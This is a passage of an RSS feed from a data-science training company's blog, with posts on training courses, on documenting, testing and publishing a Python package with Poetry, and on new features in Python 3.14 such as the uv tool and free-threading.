alt="R Consortium logo"
/&gt;
&lt;/a&gt;
&lt;br&gt;
&lt;!-- Newcastle University Solve --&gt;
&lt;a href="https://www.ncl.ac.uk/maths-physics/engagement/nusolve/"&gt;
&lt;img
src="nu-solve_logo.png"
style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-top: 1em"
alt="NU Solve logo"
/&gt;
&lt;/a&gt;
&lt;br&gt;
&lt;!-- CRC Press --&gt;
&lt;a href="https://www.routledge.com/"&gt;
&lt;img
src="crc-press-logo.png"
style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-top: 1em"
alt="CRC Press logo"
/&gt;
&lt;/a&gt;
&lt;br&gt;
&lt;!-- NICD - TODO: check if they really were sponsors --&gt;
&lt;a href="https://www.nicd.org.uk/"&gt;
&lt;img
src="nicd_logo.png"
style="width: 285px; display: block; margin-left: auto; margin-right: auto"
alt="NICD logo"
/&gt;
&lt;/a&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/sip2025-shiny-conference-summary/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Elevate Your Data Skills with Jumping Rivers Training</title><link>https://www.jumpingrivers.com/blog/jr-elevate-training-2025-r-python-bayesian-statistics-machine-learning/</link><pubDate>Tue, 28 Oct 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/jr-elevate-training-2025-r-python-bayesian-statistics-machine-learning/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/jr-elevate-training-2025-r-python-bayesian-statistics-machine-learning/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/jr-elevate-training-2025-r-python-bayesian-statistics-machine-learning/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;In today’s data-driven world, strong analytical and programming skills are essential for success.
Whether you’re just starting your data journey or looking to expand your expertise, Jumping Rivers
offers training that combines real-world experience with interactive, practical learning.&lt;/p&gt;
&lt;h2 id="expert-led-hands-on-learning"&gt;Expert-Led, Hands-On Learning&lt;/h2&gt;
&lt;p&gt;At Jumping Rivers, our trainers are experienced data scientists and engineers who work daily on real
client projects. This means the skills you learn are grounded in real-world applications, not just theory.
Our courses blend live coding, demonstrations, and interactive exercises to ensure an engaging and
effective learning experience. Every participant receives:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Comprehensive PDF notes and scripts for continued learning.&lt;/li&gt;
&lt;li&gt;Live demonstrations and practical exercises.&lt;/li&gt;
&lt;li&gt;Guidance from a trainer- whether online or onsite.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Training is available both online and in-person, with flexible options for &lt;strong&gt;individual learners&lt;/strong&gt; or &lt;strong&gt;teams&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="course-topics"&gt;Course Topics&lt;/h2&gt;
&lt;p&gt;Our training portfolio spans a wide range of topics, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;R for data analysis and reporting&lt;/li&gt;
&lt;li&gt;Python for data science and automation&lt;/li&gt;
&lt;li&gt;Git and version control&lt;/li&gt;
&lt;li&gt;Artificial Intelligence and Machine Learning fundamentals&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each course is designed to help participants apply new skills immediately to their work, with clear
examples and hands-on practice throughout.&lt;/p&gt;
&lt;h2 id="public-and-in-house-training"&gt;Public and In-House Training&lt;/h2&gt;
&lt;p&gt;Our public training programme offers scheduled courses open to all participants.
You can view our upcoming sessions here:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;https://www.jumpingrivers.com/training/public/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;For organisations looking to develop their teams, we also provide bespoke in-house training.
These sessions are fully customised, workflows, and skill levels - ensuring that your team
gains the most relevant and practical insights possible.&lt;/p&gt;
&lt;p&gt;To discuss tailored courses for your organisation, contact &lt;a href="mailto:training@jumpingrivers.com" rel="external"&gt;training@jumpingrivers.com&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="why-train-with-jumping-rivers"&gt;Why Train with Jumping Rivers&lt;/h2&gt;
&lt;p&gt;With over 1,000 courses delivered worldwide. Jumping Rivers has built
a reputation for delivering training that is both impactful and accessible.
Our clients include NHS Scotland, Shell, Wessex Water, and the Royal Statistical
Society—organisations that trust us to develop their data capability.&lt;/p&gt;
&lt;p&gt;We also offer additional benefits such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Discounts for group bookings and returning clients.&lt;/li&gt;
&lt;li&gt;Reduced rates for attendees of our events and conferences.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="take-the-next-step"&gt;Take the Next Step&lt;/h2&gt;
&lt;p&gt;Whether you’re advancing your own career or developing your team’s capabilities,
Jumping Rivers training provides the tools, confidence, and practical knowledge you need to succeed.&lt;/p&gt;
&lt;p&gt;Explore our public courses or reach out to discuss bespoke options:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;View upcoming training: &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;https://www.jumpingrivers.com/training/public/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Enquire about group training: &lt;a href="mailto:training@jumpingrivers.com" rel="external"&gt;training@jumpingrivers.com&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Invest in your growth with hands-on, expert-led training from Jumping Rivers and
take the next step in your data journey.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/jr-elevate-training-2025-r-python-bayesian-statistics-machine-learning/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Creating a Python Package with Poetry for Beginners Part2</title><link>https://www.jumpingrivers.com/blog/python-package-part-two/</link><pubDate>Thu, 23 Oct 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-package-part-two/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-package-part-two/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-package-part-two/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="intro"&gt;Intro&lt;/h2&gt;
&lt;p&gt;So far, in the &lt;a href="https://www.jumpingrivers.com/blog/whats-new-py314/" rel="external"&gt;previous blog&lt;/a&gt; we
covered creating our package with Poetry, managing our development environment and
adding a function. In the current blog post we&amp;rsquo;ll be covering the next steps with package
development including documentation, testing and how to publish to PyPI.&lt;/p&gt;
&lt;p&gt;Note: I am using my package as an example but not actually publishing it to PyPI.&lt;/p&gt;
&lt;h2 id="documentation"&gt;Documentation&lt;/h2&gt;
&lt;p&gt;When developing a package, documentation is one of the most important steps. It&amp;rsquo;s easy to
get carried away with the fun of writing packages and functions and forget to document them. There
are many reasons to write documentation, some are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Purpose:&lt;/strong&gt; Explains what the code does and why, thinking about this as developer
can often help with design.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Usability:&lt;/strong&gt; It helps users (and your future self) understand the code.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Maintenance:&lt;/strong&gt; It will make debugging and updates easier.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Standards:&lt;/strong&gt; All good packages have good documentation. It is one of the key metrics of
&lt;a href="https://www.jumpingrivers.com/litmus/" rel="external"&gt;Litmus&lt;/a&gt;, our package validation service.&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Need help with R package validation to unleash the power of open source? Check out the &lt;a href="https://www.jumpingrivers.com/litmus/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-python-package-part-2"&gt; Litmusverse suite of risk assessment tools&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="what-documentation-do-we-need"&gt;What Documentation Do We Need?&lt;/h3&gt;
&lt;h4 id="readme"&gt;README&lt;/h4&gt;
&lt;p&gt;A README file is a short, essential guide that explains your Python package at a glance. It typically includes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Project name and description: What the package does and why it’s useful.&lt;/li&gt;
&lt;li&gt;Installation instructions: How to install it (usually with pip).&lt;/li&gt;
&lt;li&gt;Usage examples: Simple code snippets showing how to get started.&lt;/li&gt;
&lt;li&gt;Features or documentation links: What’s included and where to learn more.&lt;/li&gt;
&lt;li&gt;License and contribution info: How others can use or contribute to the project.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In short, the README helps users understand, install, and use your package quickly.&lt;/p&gt;
&lt;p&gt;For a good example of a README file, instead of writing one for my package I&amp;rsquo;m going to point to
the &lt;a href="https://github.com/pandas-dev/pandas/blob/main/README.md" rel="external"&gt;pandas&lt;/a&gt; README.&lt;/p&gt;
&lt;h4 id="docstrings"&gt;Docstrings&lt;/h4&gt;
&lt;p&gt;Docstrings are short, embedded documentation inside your Python code that explain what functions, classes, or modules do. They typically include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Purpose: A brief description of what the function, class, or module does.&lt;/li&gt;
&lt;li&gt;Parameters: Names, types, and descriptions of inputs.&lt;/li&gt;
&lt;li&gt;Returns: The output type and what it is.&lt;/li&gt;
&lt;li&gt;Example usage (optional): A small code snippet showing how to use it.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In short, docstrings make your code understandable, help tools like &lt;code&gt;help()&lt;/code&gt; or IDEs
provide guidance, and serve as the basis for auto-generated API documentation.&lt;/p&gt;
&lt;p&gt;For a docstring example I am going to use my function &lt;code&gt;get_season_league&lt;/code&gt;.
Here, we are using the Sphinx markup language to document
the different input parameters and their datatypes, and
any returned values. See the &lt;a href="https://www.sphinx-doc.org/en/master/usage/domains/python.html#info-field-lists" rel="external"&gt;Sphinx documentation&lt;/a&gt; for further
information.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_season_league&lt;/span&gt;(league_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;485842&amp;#34;&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; This function will take your league ID, map over all the members
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; of your league then return a DF with a week on week league table.
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; :type league_id: str
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; :param league_id: ID of the league you are targetting
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; :returns: Data-frame of the leagues week on week standings
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; &amp;#34;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://fantasy.premierleague.com/api/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="testing"&gt;Testing&lt;/h2&gt;
&lt;p&gt;Testing is another very important part of package development that has many benefits. It can be integrated
to version control CI pipelines, meaning you can run the tests every time you push some changes to a remote git repository. Some
of the benefits of testing are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Thinking about tests whilst writing functions will aid development&lt;/li&gt;
&lt;li&gt;Well written tests will catch bugs early&lt;/li&gt;
&lt;li&gt;Ensure consistency between releases&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is lots of resources out there on writing tests for python packages. We have two previous blogs
on &lt;a href="https://pytest.org/" rel="external"&gt;pytest&lt;/a&gt;, &lt;a href="https://www.jumpingrivers.com/blog/intro-to-pytest/" rel="external"&gt;an introductory blog&lt;/a&gt;
and &lt;a href="https://www.jumpingrivers.com/blog/python-testing-advanced/" rel="external"&gt;a more advanced one.&lt;/a&gt; There are
many testing frameworks available for Python, like
&lt;a href="https://docs.python.org/3/library/unittest.html" rel="external"&gt;unittest&lt;/a&gt;
&lt;a href="https://docs.pytest.org/en/stable/index.html" rel="external"&gt;pytest&lt;/a&gt;, or
&lt;a href="https://docs.python.org/3/library/doctest.html" rel="external"&gt;doctest&lt;/a&gt; (which runs docstring-embedded examples as software tests). The type of testing you need
will often determine the framework you use.
The software literature makes distinctions between different types of tests: unit (which we will
focus on), integration, end to end, and acceptance tests. The distinction is based on the scope (how much of the software project is run/touched during the tests), isolation (do the tests rely on external services) and viewpoint (do the tests check features from a user&amp;rsquo;s perspective, or how the software works internally from a developer&amp;rsquo;s perspective).&lt;/p&gt;
&lt;h3 id="testing-my-package"&gt;Testing My Package&lt;/h3&gt;
&lt;p&gt;Thankfully my package only has one function so it will be very easy to write a test.&lt;/p&gt;
&lt;p&gt;So to begin I&amp;rsquo;ll create a test file, &lt;code&gt;tests/test_get_league.py&lt;/code&gt; this follows the naming
convention of naming the test file &lt;code&gt;test_module_name&lt;/code&gt;. You may also see test files named
&lt;code&gt;test_function_name&lt;/code&gt;, this will depend on how large your modules are. The goal is for it to be
consistent, easy to understand and ideally split up based on size.&lt;/p&gt;
&lt;p&gt;I have added some simple tests for the class of the output, the columns returned and the first
event in my default data as this will remain the same. I&amp;rsquo;m not going to go into detail on how
the tests work as we have already done blogs on this as mention above but this is my test:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_get_season_league&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; get_season_league()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Test pandas DataFrame is produced&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;assert&lt;/span&gt; isinstance(output, pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Test columns are correct&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;assert&lt;/span&gt; list(output&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;columns) &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;&amp;#34;name&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;team_name&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;event&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;points&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Test first event as it will remain the same as the data grows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; first_event &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;query(&lt;span style="color:#a5d6ff"&gt;&amp;#34;name == &amp;#39;Osheen Macoscar&amp;#39; &amp;amp; event == 1&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;assert&lt;/span&gt; first_event[&lt;span style="color:#a5d6ff"&gt;&amp;#34;points&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;69&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I have written a very surface level test here. My particular function is hard to test as
I&amp;rsquo;m calling an external API, meaning the object will differ each game-week. The API may also
go down or the output may change causing the test to fail, when my function hasn&amp;rsquo;t changed.
When touching an external resource ideally I could set up a static response to test (which I
could do for certain endpoints) but I can&amp;rsquo;t with my function as the output is supposed to change
throughout the season.&lt;/p&gt;
&lt;p&gt;Once we have written our tests we can run &lt;code&gt;pytest&lt;/code&gt; whilst in the top level of our package
to run the test(s), and it will tell you if they have passed or failed.&lt;/p&gt;
&lt;h2 id="publishing-to-pypi"&gt;Publishing to PyPI&lt;/h2&gt;
&lt;p&gt;As I mentioned at the start of the blog I am not publishing this package to PyPI, however
I will show the helpful poetry function that allows us to do it. Note these is also a
&lt;a href="https://test.pypi.org/" rel="external"&gt;TestPyPI&lt;/a&gt; that you can publish to first to ensure everything runs
smoothly.&lt;/p&gt;
&lt;p&gt;The main function for this is &lt;code&gt;poetry publish&lt;/code&gt; but there are a few steps we need to take first.
Obviously there is a level of authentication before you can publish, this can be set up by
adding your user specific PyPI token to your config:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;poetry config pypi-token.pypi &amp;lt;token&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;After you have done this you are clear to publish and can do so with:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;poetry publish --build
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The build tag at the end just builds the package by creating a the distributable
files (a .tar.gz and a .whl) inside the dist/ directory. This is required before publishing
the package.&lt;/p&gt;
&lt;h2 id="next-up"&gt;Next Up&lt;/h2&gt;
&lt;p&gt;This is where I am going to leave the series for now. We have looked at all the basics you need
when developing a python package from writing and documenting functions all the way to testing
and publishing the package. In the next iteration I may look at building out this package or
parallelising the function I&amp;rsquo;ve written, but it is not scheduled to be written anytime soon.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-package-part-two/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>What's new for Python in 2025?</title><link>https://www.jumpingrivers.com/blog/whats-new-py314/</link><pubDate>Thu, 16 Oct 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/whats-new-py314/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/whats-new-py314/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/whats-new-py314/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Python 3.14 was released on 7th October 2025. Here we summarise some
of the more interesting changes and some trends in Python development and data-science
over the past year. We will highlight the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the colourful Python command-line interface;&lt;/li&gt;
&lt;li&gt;project-management tool &lt;code&gt;uv&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;free-threading;&lt;/li&gt;
&lt;li&gt;and a brief summary of other developments.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The &lt;a href="https://docs.python.org/3.14/whatsnew/3.14.html" rel="external"&gt;Python 3.14 release notes&lt;/a&gt;
also describe the changes to base Python.&lt;/p&gt;
&lt;h2 id="colourful-repl"&gt;Colourful REPL&lt;/h2&gt;
&lt;p&gt;At Jumping Rivers we have taught a lot of people to program in Python.
Throughout a programming career you get used to making, and learning
from, mistakes. The most common mistakes made in introductory
programming lessons may still trip you up in 10 years time: unmatched
parentheses, typos, missing quote symbols, unimported dependencies.&lt;/p&gt;
&lt;p&gt;Our Python training courses are presented using
&lt;a href="https://jupyter.org/" rel="external"&gt;Jupyter&lt;/a&gt;. Jupyter
notebooks have syntax highlighting that makes it easy to identify an
unfinished string, or a mis-spelled keyword.&lt;/p&gt;
&lt;p&gt;But, most Python learners don’t use Jupyter (or other high-level
programming tools) on day one - they experiment with Python at the
command line. You can type “python” into your shell/terminal window and
start programming into the “REPL” (read-evaluate-print loop).&lt;/p&gt;
&lt;p&gt;Any effort to make the REPL easier to work with will be beneficial to
beginning programmers. So the introduction of syntax highlighting in the
Python 3.14 REPL is really beneficial.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-whats-new-py314"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="uv-and-package-development"&gt;&lt;code&gt;uv&lt;/code&gt; and package development&lt;/h2&gt;
&lt;p&gt;One of the big trends in Python development within 2025, is the rise of
the project management tool
&lt;a href="https://docs.astral.sh/uv/" rel="external"&gt;&lt;code&gt;uv&lt;/code&gt;&lt;/a&gt;. This is a Rust-based command-line tool
and can be used to initialise a package / project structure, to specify
the development and runtime environment of a project, and to publish a
package to PyPI.&lt;/p&gt;
&lt;p&gt;At Jumping Rivers, we have used &lt;code&gt;poetry&lt;/code&gt; for many of the jobs that &lt;code&gt;uv&lt;/code&gt;
excels at. Python is used for the data preparation tasks for
diffify.com, and we use
&lt;a href="https://python-poetry.org/" rel="external"&gt;&lt;code&gt;poetry&lt;/code&gt;&lt;/a&gt; to ensure that our developers each use
precisely the same package versions when working on that project (See our current
&lt;a href="https://www.jumpingrivers.com/blog/python-package/" rel="external"&gt;blog series on Poetry&lt;/a&gt;). But,
&lt;code&gt;poetry&lt;/code&gt; doesn’t prevent developers using different versions of Python.
For that, we need a second tool like
&lt;a href="https://github.com/pyenv/pyenv" rel="external"&gt;&lt;code&gt;pyenv&lt;/code&gt;&lt;/a&gt; (which allows switching
between different Python versions) or for each developer to have the
same Python version installed on their machine.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;uv&lt;/code&gt; goes a step further than &lt;code&gt;poetry&lt;/code&gt; and allows us to pin Python
versions for a project. Let’s use &lt;code&gt;uv&lt;/code&gt; to install Python 3.14, so that
we can test out features in the new release.&lt;/p&gt;
&lt;p&gt;First follow the
&lt;a href="https://docs.astral.sh/uv/getting-started/installation/" rel="external"&gt;instructions for installing &lt;code&gt;uv&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Then at the command line, we will use &lt;code&gt;uv&lt;/code&gt; to create a new project where
we’ll use Python 3.14.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [bash]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd ~/temp
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mkdir blog-py3.14
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd blog-py3.14
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Which versions of Python 3.14 are available via uv?&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv python list | grep 3.14
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# cpython-3.14.0rc2-linux-x86_64-gnu &amp;lt;download available&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# cpython-3.14.0rc2+freethreaded-linux-x86_64-gnu &amp;lt;download available&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You’ll see something similar regardless of the operating system that you
use. That lists two versions of Python 3.14 - one with an optional
system called “Free Threading” (see later). We’ll install both versions
of Python:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv python install cpython-3.14.0rc2-linux-x86_64-gnu
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv python install cpython-3.14.0rc2+freethreaded-linux-x86_64-gnu
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Users of &lt;code&gt;pyenv&lt;/code&gt; will be able to install Python 3.14 in a similar
manner.&lt;/p&gt;
&lt;p&gt;We can select between the two different Python versions at the command
line. First using the version that does not have free threading:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv run --python&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;3.14 python
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Python 3.14.0rc2 (main, Aug 18 2025, 19:19:22) [Clang 20.1.4 ] on linux&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;gt;&amp;gt;&amp;gt; import sys
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;gt;&amp;gt;&amp;gt; sys._is_gil_enabled&lt;span style="color:#ff7b72;font-weight:bold"&gt;()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# True&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then using the version with free threading (note the &lt;code&gt;t&lt;/code&gt; suffix)&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv run --python&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;3.14t python
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Python 3.14.0rc2 free-threading build (main, Aug 18 2025, 19:19:12) [Clang 20.1.4 ] on linux&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ...&lt;/span&gt;
